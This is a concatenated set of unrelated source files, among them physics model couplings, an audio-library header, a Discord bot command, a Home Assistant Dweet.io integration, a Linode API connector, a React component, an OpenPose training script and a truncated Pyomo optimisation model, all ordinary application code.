# This file was automatically created by FeynRules $Revision: 535 $
# Mathematica version: 7.0 for Mac OS X x86 (64-bit) (November 11, 2008)
# Date: Fri 18 Mar 2011 18:40:51
from object_library import all_couplings, Coupling
from function_library import complexconjugate, re, im, csc, sec, acsc, asec
################
# R2 couplings #
################
R2_3Gq = Coupling(name = 'R2_3Gq',
value = '2.0*G**3/(48.0*cmath.pi**2)',
order = {'QCD':3})
R2_3Gg = Coupling(name = 'R2_3Gg',
value = 'Ncol*G**3/(48.0*cmath.pi**2)*(7.0/4.0+lhv)',
order = {'QCD':3})
#=============================================================================================
# 4-gluon R2 couplings
#=============================================================================================
# Gluon contribution to it
GC_4GR2_Gluon_delta5 = Coupling(name = 'GC_4GR2_Gluon_delta5',
value = '-4.0*complex(0,1)*RGR2*(2.0*lhv+5.0)',
order = {'QCD':4})
GC_4GR2_Gluon_delta7 = Coupling(name = 'GC_4GR2_Gluon_delta7',
value = '2.0*complex(0,1)*RGR2*(2.0*lhv+7.0)',
order = {'QCD':4})
GC_4GR2_2Struct = Coupling(name = 'GC_4GR2_2Struct',
value = '2.0*complex(0,1)*RGR2*Ncol*(lhv+3.0)',
order = {'QCD':4})
GC_4GR2_4Struct = Coupling(name = 'GC_4GR2_4Struct',
value = '-complex(0,1)*RGR2*Ncol*(4.0*lhv+11.0)',
order = {'QCD':4})
# Fermion contribution to it
GC_4GR2_Fermion_delta5 = Coupling(name = 'GC_4GR2_Fermion_delta5',
value = '(2.0/Ncol)*5.0*complex(0,1)*RGR2',
order = {'QCD':4})
GC_4GR2_Fermion_delta11 = Coupling(name = 'GC_4GR2_Fermion_delta11',
value = '-(2.0/Ncol)*11.0*complex(0,1)*RGR2',
order = {'QCD':4})
GC_4GR2_5Struct = Coupling(name = 'GC_4GR2_5Struct',
value = '5.0*complex(0,1)*RGR2',
order = {'QCD':4})
GC_4GR2_11Struct = Coupling(name = 'GC_4GR2_11Struct',
value = '-11.0*complex(0,1)*RGR2',
order = {'QCD':4})
#=============================================================================================
R2_GQQ = Coupling(name = 'R2_GQQ',
value = '-complex(0,1)*G**3/(16.0*cmath.pi**2)*((Ncol**2-1)/(2.0*Ncol))*(1.0+lhv)',
order = {'QCD':3})
R2_GGq = Coupling(name = 'R2_GGq',
value = 'complex(0,1)*G**2/(48.0*cmath.pi**2)',
order = {'QCD':2})
R2_GGb = Coupling(name = 'R2_GGb',
value = 'complex(0,1)*G**2*(-6.0*MB**2)/(48.0*cmath.pi**2)',
order = {'QCD':2})
R2_GGt = Coupling(name = 'R2_GGt',
value = 'complex(0,1)*G**2*(-6.0*MT**2)/(48.0*cmath.pi**2)',
order = {'QCD':2})
R2_GGg_1 = Coupling(name = 'R2_GGg_1',
value = 'complex(0,1)*G**2*Ncol/(48.0*cmath.pi**2)*(1.0/2.0+lhv)',
order = {'QCD':2})
R2_GGg_2 = Coupling(name = 'R2_GGg_2',
value = '-complex(0,1)*G**2*Ncol/(48.0*cmath.pi**2)*lhv',
order = {'QCD':2})
R2_QQq = Coupling(name = 'R2_QQq',
value = 'complex(0,1)*G**2*(Ncol**2-1)/(32.0*cmath.pi**2*Ncol)',
order = {'QCD':2})
R2_QQb = Coupling(name = 'R2_QQb',
value = 'complex(0,1)*G**2*(Ncol**2-1)*(-2.0*MB)/(32.0*cmath.pi**2*Ncol)',
order = {'QCD':2})
R2_QQt = Coupling(name = 'R2_QQt',
value = 'complex(0,1)*G**2*(Ncol**2-1)*(-2.0*MT)/(32.0*cmath.pi**2*Ncol)',
order = {'QCD':2})
################
# UV couplings #
################
UV_3Gg = Coupling(name = 'UV_3Gg',
value = '-G_UVg*G',
order = {'QCD':3})
UV_3Gq = Coupling(name = 'UV_3Gq',
value = '-G_UVq*G',
order = {'QCD':3})
UV_3Gb = Coupling(name = 'UV_3Gb',
value = '-G_UVb*G',
order = {'QCD':3})
UV_3Gt = Coupling(name = 'UV_3Gt',
value = '-G_UVt*G',
order = {'QCD':3})
UV_4Gg = Coupling(name = 'UV_4Gg',
value = '2.0*complex(0,1)*G_UVg*(G**2)',
order = {'QCD':4})
UV_4Gq = Coupling(name = 'UV_4Gq',
value = '2.0*complex(0,1)*G_UVq*(G**2)',
order = {'QCD':4})
UV_4Gb = Coupling(name = 'UV_4Gb',
value = '2.0*complex(0,1)*G_UVb*(G**2)',
order = {'QCD':4})
UV_4Gt = Coupling(name = 'UV_4Gt',
value = '2.0*complex(0,1)*G_UVt*(G**2)',
order = {'QCD':4})
UV_GQQg = Coupling(name = 'UV_GQQg',
value = 'complex(0,1)*G_UVg*G',
order = {'QCD':3})
UV_GQQq = Coupling(name = 'UV_GQQq',
value = 'complex(0,1)*G_UVq*G',
order = {'QCD':3})
UV_GQQb = Coupling(name = 'UV_GQQb',
value = 'complex(0,1)*G_UVb*G',
order = {'QCD':3})
UV_GQQt = Coupling(name = 'UV_GQQt',
value = 'complex(0,1)*G_UVt*G',
order = {'QCD':3})
UV_bMass = Coupling(name = 'UV_bMass',
value = 'bMass_UV',
order = {'QCD':2})
UV_tMass = Coupling(name = 'UV_tMass',
value = 'tMass_UV',
order = {'QCD':2})
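# Illustrative only (not part of the generated model): a hedged sketch of how one
# of the analytic 'value' strings above could be evaluated numerically, assuming
# example values for the model parameters G, Ncol and lhv.
# import cmath
# example_params = {'G': 1.2, 'Ncol': 3.0, 'lhv': 0.0, 'cmath': cmath}
# print(eval(R2_3Gg.value, example_params))  # numeric value of the R2_3Gg coupling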
|
/*
Copyright (C) 2014 Paul Brossier <piem@aubio.org>
This file is part of aubio.
aubio is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
aubio is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with aubio. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef AUBIO_SOURCE_WAVREAD_H
#define AUBIO_SOURCE_WAVREAD_H
/** \file
Read from file using custom wav reading routines.
Avoid including this file directly! Prefer using ::aubio_source_t instead to
make your code portable.
To write to file, use ::aubio_sink_t.
References:
- http://netghost.narod.ru/gff/graphics/summary/micriff.htm
- https://ccrma.stanford.edu/courses/422/projects/WaveFormat/
\example io/test-source_wavread.c
*/
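/* A minimal usage sketch (illustrative only; error handling omitted), assuming a
512-frame hop, the file's native samplerate, and the fvec.h helpers new_fvec /
del_fvec; "track.wav" is an example path:
uint_t hop = 512, read = 0;
aubio_source_wavread_t *s = new_aubio_source_wavread("track.wav", 0, hop);
fvec_t *block = new_fvec(hop);
do {
aubio_source_wavread_do(s, block, &read);
// process `read` frames from `block` here
} while (read == hop);
del_fvec(block);
del_aubio_source_wavread(s);
*/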
#ifdef __cplusplus
extern "C" {
#endif
/** wavread media source object */
typedef struct _aubio_source_wavread_t aubio_source_wavread_t;
/**
create new ::aubio_source_wavread_t
\param uri the file path or uri to read from
\param samplerate sampling rate to view the file at
\param hop_size the size of the blocks to read from
Creates a new source object. If `0` is passed as `samplerate`, the sample
rate of the original file is used.
The samplerate of the newly created source can be obtained using
::aubio_source_wavread_get_samplerate.
*/
aubio_source_wavread_t * new_aubio_source_wavread(const char_t * uri, uint_t samplerate, uint_t hop_size);
/**
read monophonic vector of length hop_size from source object
\param s source object, created with ::new_aubio_source_wavread
\param read_to ::fvec_t of data to read to
\param[out] read number of frames actually read
Upon return, `read` contains the number of frames actually read from the
source: `hop_size` if enough frames could be read, less otherwise.
*/
void aubio_source_wavread_do(aubio_source_wavread_t * s, fvec_t * read_to, uint_t * read);
/**
read polyphonic vector of length hop_size from source object
\param s source object, created with ::new_aubio_source_wavread
\param read_to ::fmat_t of data to read to
\param[out] read number of frames actually read
Upon return, `read` contains the number of frames actually read from the
source: `hop_size` if enough frames could be read, less otherwise.
*/
void aubio_source_wavread_do_multi(aubio_source_wavread_t * s, fmat_t * read_to, uint_t * read);
/**
get samplerate of source object
\param s source object, created with ::new_aubio_source_wavread
\return samplerate, in Hz
*/
uint_t aubio_source_wavread_get_samplerate(aubio_source_wavread_t * s);
/**
get number of channels of source object
\param s source object, created with ::new_aubio_source_wavread
\return number of channels
*/
uint_t aubio_source_wavread_get_channels (aubio_source_wavread_t * s);
/**
seek source object
\param s source object, created with ::new_aubio_source_wavread
\param pos position to seek to, in frames
\return 0 if successful, non-zero on failure
*/
uint_t aubio_source_wavread_seek (aubio_source_wavread_t *s, uint_t pos);
/**
get the duration of source object, in frames
\param s source object, created with ::new_aubio_source_wavread
\return number of frames in file
*/
uint_t aubio_source_wavread_get_duration (const aubio_source_wavread_t *s);
/**
close source
\param s source object, created with ::new_aubio_source_wavread
\return 0 if successful, non-zero on failure
*/
uint_t aubio_source_wavread_close (aubio_source_wavread_t *s);
/**
close source and cleanup memory
\param s source object, created with ::new_aubio_source_wavread
*/
void del_aubio_source_wavread(aubio_source_wavread_t * s);
#ifdef __cplusplus
}
#endif
#endif /* AUBIO_SOURCE_WAVREAD_H */
|
const Command = require('../Command');
const messages = {
'errorChecking': 'Hmm.. I encountered some issues looking up the players. Is Shotbow.net offline?',
'errorBadKey': 'Hmm.. I couldn\'t find the game you were talking about. Try again?',
'result': 'There { count, plural, one {is currently # player} other {are currently # players} } connected to {game}.',
'help': 'You can use `!playercount` to show the players connected to the network or some of the games.\nYou can use any of the following names: {names}'
};
const cacheTTL = 10 * 1000; // 10 seconds in milliseconds
module.exports = Command.extend({
shouldDeleteMessage: true,
commandName: 'playercount',
https: null,
cache: null,
cacheKey: 'serverlist',
dependencies: {
'commandPrefix': 'commandPrefix',
'https': 'https',
'Cache': 'cache'
},
processMessage: async function (message, tokens) {
return await this.fetchServerlist().then(serverList => {
if (serverList === false) {
return message.channel.send(this.i18n.__mf(messages.errorChecking));
}
tokens.shift();
let key = this.getGameKey(tokens.join(' ').trim(), message.channel.id);
if (key === 'help') {
let list = Object.values(this.config.games.names)
.map(item => {
return '`' + item + '`'
})
.join(', ');
return message.channel.send(this.i18n.__mf(messages.help, {names: list}));
}
if (typeof this.config.games.names[key] === 'undefined' || typeof serverList[key] === 'undefined') {
return message.channel.send(this.i18n.__mf(messages.errorBadKey, {key: key}));
}
let gameName = this.config.games.names[key];
let count = serverList[key];
return message.channel.send(this.i18n.__mf(messages.result, {count: count, game: gameName}));
}).catch(e => {
console.error(e);
});
},
getGameKey: function (requestedGame, room) {
if (!requestedGame) {
return typeof this.config.games.rooms[room] !== 'undefined' ? this.config.games.rooms[room] : 'all';
}
requestedGame = requestedGame.toLowerCase();
if (this.config.games.aliases[requestedGame]) {
requestedGame = this.config.games.aliases[requestedGame];
}
return requestedGame;
},
fetchServerlist: function() {
return new Promise((resolve, reject) => {
let cachedData = this.cache.get(this.cacheKey);
if (cachedData) {
resolve(cachedData);
return;
}
this.https.get('https://shotbow.net/serverList.json', res => {
let responseData = '';
res.setEncoding('utf8');
res.on('data', data => {
responseData += data;
});
res.on('end', () => {
let serverList;
try {
serverList = JSON.parse(responseData);
if (serverList !== false) {
this.cache.set(this.cacheKey, serverList, cacheTTL);
}
resolve(serverList);
} catch (e) {
resolve(false);
}
});
}).on('error', () => resolve(false)); // network failure: reported via the errorChecking message
});
}
});
|
if (document.querySelector('#com-atlassian-confluence')) {
console.log(" -- cf-auto-expander");
/* jquery-based auto-expander */
// $('.expand-control > .icon:not(.expanded)')
// .parent()
// .click();
/* pure-js auto-expander */
[]
.slice.call(document.querySelectorAll('.expand-control > .icon:not(.expanded)'))
.map(function (e) { return (e.parentNode); })
.filter(function (e) { return (e !== null); })
.forEach(function (e) { e.click(); });
}
|
$(function() {
var data_to_pass = {},
dg_status = $("#dg_status").val();
if(dg_status) {
data_to_pass = {
"dg_status": dg_status
}
}
// get vars
$.ajax({
url: "/url/to/ajax_get_vars.php",
type: "POST",
data: data_to_pass,
dataType: 'json',
success: function(data) {
var elem_php_bs_grid = $("#php_bs_grid_form");
elem_php_bs_grid.php_bs_grid({
addnew_record_url: data["addnew_record_url"],
criteria: data["criteria"],
msg_criteria_not_changed: data["msg_criteria_not_changed"],
msg_apply_or_reset_criteria: data["msg_apply_or_reset_criteria"],
ajax_validate_form_url: data["ajax_validate_form_url"],
ajax_reset_all_url: data["ajax_reset_all_url"],
bs_modal_id: data["bs_modal_id"],
bs_modal_content_id: data["bs_modal_content_id"]
});
}
});
});
|
"""Support for sending data to Dweet.io."""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import (
CONF_NAME, CONF_WHITELIST, EVENT_STATE_CHANGED, STATE_UNKNOWN)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import state as state_helper
from homeassistant.util import Throttle
REQUIREMENTS = ['dweepy==0.3.0']
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'dweet'
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=1)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_WHITELIST, default=[]):
vol.All(cv.ensure_list, [cv.entity_id]),
}),
}, extra=vol.ALLOW_EXTRA)
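# A hedged configuration sketch (entity names are examples only) that the schema
# above accepts, written as the equivalent configuration.yaml entry:
#
# dweet:
#   name: my_home_thing
#   whitelist:
#     - sensor.living_room_temperature
#     - sensor.outside_humidity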
def setup(hass, config):
"""Set up the Dweet.io component."""
conf = config[DOMAIN]
name = conf.get(CONF_NAME)
whitelist = conf.get(CONF_WHITELIST)
json_body = {}
def dweet_event_listener(event):
"""Listen for new messages on the bus and sends them to Dweet.io."""
state = event.data.get('new_state')
if state is None or state.state in (STATE_UNKNOWN, '') \
or state.entity_id not in whitelist:
return
try:
_state = state_helper.state_as_number(state)
except ValueError:
_state = state.state
json_body[state.attributes.get('friendly_name')] = _state
send_data(name, json_body)
hass.bus.listen(EVENT_STATE_CHANGED, dweet_event_listener)
return True
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def send_data(name, msg):
"""Send the collected data to Dweet.io."""
import dweepy
try:
dweepy.dweet_for(name, msg)
except dweepy.DweepyError:
_LOGGER.error("Error saving data to Dweet.io: %s", msg)
|
var project = (function(obj)
{
var plugin_path = "../plugin/project";
obj.plugin_path = plugin_path;
obj.init = function()
{
central.project = {};
//support.loadJS(plugin_path+"/new_project.js");
support.loadJS(plugin_path+"/open_project.js");
support.loadJS(plugin_path+"/project_tree.js");
support.loadJS(plugin_path+"/compile.ui.js");
support.loadJS(plugin_path+"/compile.js");
};
obj.destroy = function()
{
console.log('destroy');
};
return obj;
})(project||{});
|
"use strict";
exports.__esModule = true;
/**
* Returns true if any item within the haystack contains the needle
* @param {string} needle
* @param {array} haystack
* @return {boolean}
*/
exports["default"] = (function (needle, haystack) {
if (needle === void 0) { needle = ''; }
if (haystack === void 0) { haystack = []; }
for (var i = 0; i < haystack.length; ++i) {
var item = haystack[i];
if (needle === item) {
return true;
}
if (item.indexOf(needle) !== -1) {
return true;
}
}
return false;
});
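// Illustrative usage (assuming the default export is imported as `contains`):
//   contains('err', ['warning', 'error'])   // true: 'error' contains 'err'
//   contains('fatal', ['warning', 'error']) // false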
|
#!/usr/bin/env python
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import copy
import sys
import hasher
import json5_generator
import name_utilities
import template_expander
from aria_properties import ARIAReader
from json5_generator import Json5File
def _symbol(entry):
return 'k' + entry['name'].to_upper_camel_case()
class MakeQualifiedNamesWriter(json5_generator.Writer):
default_parameters = {}
default_metadata = {
'attrsNullNamespace': None,
'export': '',
'namespace': '',
'namespacePrefix': '',
'namespaceURI': '',
}
filters = {
'hash': hasher.hash,
'symbol': _symbol,
}
def __init__(self, json5_file_paths, output_dir):
super(MakeQualifiedNamesWriter, self).__init__(None, output_dir)
self._input_files = copy.copy(json5_file_paths)
assert len(json5_file_paths) <= 3, \
'MakeQualifiedNamesWriter requires at most 3 input files, got %d.' % \
len(json5_file_paths)
# Input files are in a strict order with more optional files *first*:
# 1) ARIA properties
# 2) Tags
# 3) Attributes
if len(json5_file_paths) >= 3:
aria_json5_filename = json5_file_paths.pop(0)
self.aria_reader = ARIAReader(aria_json5_filename)
else:
self.aria_reader = None
if len(json5_file_paths) >= 2:
tags_json5_filename = json5_file_paths.pop(0)
self.tags_json5_file = Json5File.load_from_files(
[tags_json5_filename], self.default_metadata,
self.default_parameters)
else:
self.tags_json5_file = None
self.attrs_json5_file = Json5File.load_from_files(
[json5_file_paths.pop()], self.default_metadata,
self.default_parameters)
if self.aria_reader is not None:
self.attrs_json5_file.merge_from(
self.aria_reader.attributes_list())
self.namespace = self._metadata('namespace')
cpp_namespace = self.namespace.lower() + '_names'
namespace_prefix = self._metadata('namespacePrefix') or 'k'
namespace_uri = self._metadata('namespaceURI')
use_namespace_for_attrs = self.attrs_json5_file.metadata[
'attrsNullNamespace'] is None
self._outputs = {
(self.namespace.lower() + "_names.h"): self.generate_header,
(self.namespace.lower() + "_names.cc"):
self.generate_implementation,
}
qualified_header = self._relative_output_dir + self.namespace.lower(
) + '_names.h'
self._template_context = {
'attrs':
self.attrs_json5_file.name_dictionaries,
'cpp_namespace':
cpp_namespace,
'export':
self._metadata('export'),
'header_guard':
self.make_header_guard(qualified_header),
'input_files':
self._input_files,
'namespace':
self.namespace,
'namespace_prefix':
namespace_prefix,
'namespace_uri':
namespace_uri,
'tags':
self.tags_json5_file.name_dictionaries
if self.tags_json5_file else [],
'this_include_path':
qualified_header,
'use_namespace_for_attrs':
use_namespace_for_attrs,
}
def _metadata(self, name):
metadata = self.attrs_json5_file.metadata[name].strip('"')
if self.tags_json5_file:
assert metadata == self.tags_json5_file.metadata[name].strip(
'"'), 'Both files must have the same %s.' % name
return metadata
@template_expander.use_jinja(
'templates/make_qualified_names.h.tmpl', filters=filters)
def generate_header(self):
return self._template_context
@template_expander.use_jinja(
'templates/make_qualified_names.cc.tmpl', filters=filters)
def generate_implementation(self):
return self._template_context
if __name__ == "__main__":
json5_generator.Maker(MakeQualifiedNamesWriter).main()
|
$(document).ready(function() {
var timeout = setTimeout(function() {
$('.check').on('click', function() {
$(this).toggleClass('checked');
});
}, 1000);
});
|
"""
WSGI config for project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")
# from whitenoise.django import DjangoWhiteNoise
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# application = DjangoWhiteNoise(application)
|
/**
* Auto-generated action file for "Linode" API.
*
* Generated at: 2019-06-06T13:12:27.533Z
* Mass generator version: 1.1.0
*
* flowground :- Telekom iPaaS / linode-com-connector
* Copyright © 2019, Deutsche Telekom AG
* contact: flowground@telekom.de
*
* All files of this connector are licensed under the Apache 2.0 License. For details
* see the file LICENSE on the toplevel directory.
*
*
* Operation: 'getLongviewSubscriptions'
* Endpoint Path: '/longview/subscriptions'
* Method: 'get'
*
*/
const Swagger = require('swagger-client');
const processWrapper = require('../services/process-wrapper');
const spec = require('../spec.json');
// this wrapper offers a simplified emitData(data) function
module.exports.process = processWrapper(processAction);
// parameter names for this call
const PARAMETERS = [
"page",
"page_size"
];
// mappings from connector field names to API field names
const FIELD_MAP = {
"page": "page",
"page_size": "page_size"
};
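// Illustrative input (example values only): a message body of
// { "page": 1, "page_size": 25 } passes through FIELD_MAP unchanged and is
// forwarded as the query parameters of the getLongviewSubscriptions call.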
function processAction(msg, cfg) {
var isVerbose = process.env.debug || cfg.verbose;
if (isVerbose) {
console.log(`---MSG: ${JSON.stringify(msg)}`);
console.log(`---CFG: ${JSON.stringify(cfg)}`);
console.log(`---ENV: ${JSON.stringify(process.env)}`);
}
const contentType = undefined;
const body = msg.body;
mapFieldNames(body);
let parameters = {};
for(let param of PARAMETERS) {
parameters[param] = body[param];
}
// credentials for this operation
let securities = {};
let callParams = {
spec: spec,
operationId: 'getLongviewSubscriptions',
pathName: '/longview/subscriptions',
method: 'get',
parameters: parameters,
requestContentType: contentType,
requestBody: body.requestBody,
securities: {authorized: securities},
server: spec.servers[cfg.server] || cfg.otherServer,
};
if (isVerbose) {
let out = Object.assign({}, callParams);
out.spec = '[omitted]';
console.log(`--SWAGGER CALL: ${JSON.stringify(out)}`);
}
// Call operation via Swagger client
return Swagger.execute(callParams).then(data => {
// emit a single message with data
this.emitData(data);
// if the response contains an array of entities, you can emit them one by one:
// data.obj.someItems.forEach((item) => {
// this.emitData(item);
// }
});
}
function mapFieldNames(obj) {
if(Array.isArray(obj)) {
obj.forEach(mapFieldNames);
}
else if(typeof obj === 'object' && obj) {
Object.keys(obj).forEach(key => {
mapFieldNames(obj[key]);
let goodKey = FIELD_MAP[key];
if(goodKey && goodKey !== key) {
obj[goodKey] = obj[key];
delete obj[key];
}
});
}
}
|
import React, { Component } from 'react';
import PropTypes from 'prop-types';
import { translate } from 'react-i18next';
import style from './style.styl';
class Switch extends Component {
static defaultProps = {
selected: false,
apply: () => {}
}
static propTypes = {
selected: PropTypes.bool,
apply: PropTypes.func
}
constructor (props) {
super(props)
this.state = {
selected: props.selected
}
this.apply = props.apply.bind(this)
}
onChange () {
const selected = !this.state.selected
this.setState({selected})
this.apply(selected)
}
render () {
let {props, state} = this
return (
<label className={style.switch}>
<input className={style['settings-checkbox']} checked={state.selected} type="checkbox" onChange={this.onChange.bind(this)}/>
<div className={style.slider}></div>
</label>
)
}
}
export default translate(['switch'])(Switch);
|
import random
import math
import time
import pandas as pd
import numpy as np
import torch
import torch.utils.data as data
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# Set the initial random seeds
torch.manual_seed(1234)
np.random.seed(1234)
random.seed(1234)
from utils.dataloader import make_datapath_list, DataTransform, COCOkeypointsDataset
# Create file lists from MS COCO
train_img_list, train_mask_list, val_img_list, val_mask_list, train_meta_list, val_meta_list = make_datapath_list(
rootpath="./data/")
# Use 1024 samples for training
# keep the count a multiple of the batch size
train_img_list = train_img_list[:1024]
train_mask_list = train_mask_list[:1024]
val_img_list = val_img_list[:1024]
val_mask_list = val_mask_list[:1024]
train_meta_list = train_meta_list[:1024]
# Create the dataset
train_dataset = COCOkeypointsDataset(
val_img_list, val_mask_list, val_meta_list, phase="train", transform=DataTransform())
# To keep this example simple, no validation dataset is created
# val_dataset = CocokeypointsDataset(val_img_list, val_mask_list, val_meta_list, phase="val", transform=DataTransform())
# Create the DataLoader
batch_size = 4
train_dataloader = data.DataLoader(
train_dataset, batch_size=batch_size, shuffle=True)
dataloaders_dict = {"train": train_dataloader, "val": None}
# # Create the model
# In[4]:
from utils.openpose_net import OpenPoseNet
net = OpenPoseNet()
# # Define the loss function
# In[5]:
class OpenPoseLoss(nn.Module):
def __init__(self):
super(OpenPoseLoss, self).__init__()
def forward(self, saved_for_loss, heatmap_target, heat_mask, paf_target, paf_mask):
"""
tính loss
Parameters
----------
saved_for_loss : Output ofOpenPoseNet (list)
heatmap_target : [num_batch, 19, 46, 46]
Anotation information
heatmap_mask : [num_batch, 19, 46, 46]
paf_target : [num_batch, 38, 46, 46]
PAF Anotation
paf_mask : [num_batch, 38, 46, 46]
PAF mask
Returns
-------
loss :
"""
total_loss = 0
for j in range(6):
# Do not count masked positions
pred1 = saved_for_loss[2 * j] * paf_mask
gt1 = paf_target.float() * paf_mask
# heatmaps
pred2 = saved_for_loss[2 * j + 1] * heat_mask
gt2 = heatmap_target.float()*heat_mask
total_loss += F.mse_loss(pred1, gt1, reduction='mean') + F.mse_loss(pred2, gt2, reduction='mean')
return total_loss
criterion = OpenPoseLoss()
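# A quick shape sanity check (illustrative only, commented out): fake a batch of 2
# with random tensors; saved_for_loss normally comes from OpenPoseNet and is mocked
# here as 12 tensors alternating PAF (38 ch) and heatmap (19 ch) outputs.
# _fake = [torch.rand(2, 38, 46, 46) if i % 2 == 0 else torch.rand(2, 19, 46, 46)
#          for i in range(12)]
# _loss = criterion(_fake, torch.rand(2, 19, 46, 46), torch.ones(2, 19, 46, 46),
#                   torch.rand(2, 38, 46, 46), torch.ones(2, 38, 46, 46))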
# # Configure the optimizer
# In[6]:
optimizer = optim.SGD(net.parameters(), lr=1e-2,
momentum=0.9,
weight_decay=0.0001)
# # Run training
# In[7]:
def train_model(net, dataloaders_dict, criterion, optimizer, num_epochs):
# Check whether a GPU is available on this machine
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print("Use:", device)
# Move the model onto the device
net.to(device)
torch.backends.cudnn.benchmark = True
num_train_imgs = len(dataloaders_dict["train"].dataset)
batch_size = dataloaders_dict["train"].batch_size
iteration = 1
# training loop
for epoch in range(num_epochs):
# record the start time of the epoch
t_epoch_start = time.time()
t_iter_start = time.time()
epoch_train_loss = 0.0
epoch_val_loss = 0.0
print('-------------')
print('Epoch {}/{}'.format(epoch+1, num_epochs))
print('-------------')
# loop over the training and validation phases
for phase in ['train', 'val']:
if phase == 'train':
net.train()
optimizer.zero_grad()
print('(train)')
# skip validation this time
else:
continue
# net.eval()
# print('-------------')
# print('(val)')
# Fetch each minibatch from the data loader
for imges, heatmap_target, heat_mask, paf_target, paf_mask in dataloaders_dict[phase]:
if imges.size()[0] == 1:
continue
# Send the data to the GPU if one is available
imges = imges.to(device)
heatmap_target = heatmap_target.to(device)
heat_mask = heat_mask.to(device)
paf_target = paf_target.to(device)
paf_mask = paf_mask.to(device)
# reset the optimizer's gradients
optimizer.zero_grad()
# forward pass
with torch.set_grad_enabled(phase == 'train'):
_, saved_for_loss = net(imges)
loss = criterion(saved_for_loss, heatmap_target,
heat_mask, paf_target, paf_mask)
del saved_for_loss
# backpropagate the loss during training
if phase == 'train':
loss.backward()
optimizer.step()
if (iteration % 10 == 0):
t_iter_finish = time.time()
duration = t_iter_finish - t_iter_start
print('Iteration {} || Loss: {:.4f} || 10iter: {:.4f} sec.'.format(
iteration, loss.item()/batch_size, duration))
t_iter_start = time.time()
epoch_train_loss += loss.item()
iteration += 1
# Validation (skip)
# else:
#epoch_val_loss += loss.item()
t_epoch_finish = time.time()
print('-------------')
print('epoch {} || Epoch_TRAIN_Loss:{:.4f} ||Epoch_VAL_Loss:{:.4f}'.format(
epoch+1, epoch_train_loss/num_train_imgs, 0))
print('timer: {:.4f} sec.'.format(t_epoch_finish - t_epoch_start))
t_epoch_start = time.time()
# Save the weights after training
torch.save(net.state_dict(), 'weights/openpose_net_' +
str(epoch+1) + '.pth')
# In[ ]:
# Train (run once)
num_epochs = 2
train_model(net, dataloaders_dict, criterion, optimizer, num_epochs=num_epochs)
# In[ ]:
|
# MINLP written by GAMS Convert at 01/15/21 11:37:32
#
# Equation counts
# Total E G L N X C B
# 1115 397 80 638 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 605 485 120 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 2547 2415 132 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x2 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x3 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x4 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x5 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x6 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x7 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x8 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x9 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x10 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x11 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x12 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x13 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x14 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x15 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x16 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x17 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x18 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x19 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x20 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x21 = Var(within=Reals,bounds=(None,None),initialize=0)
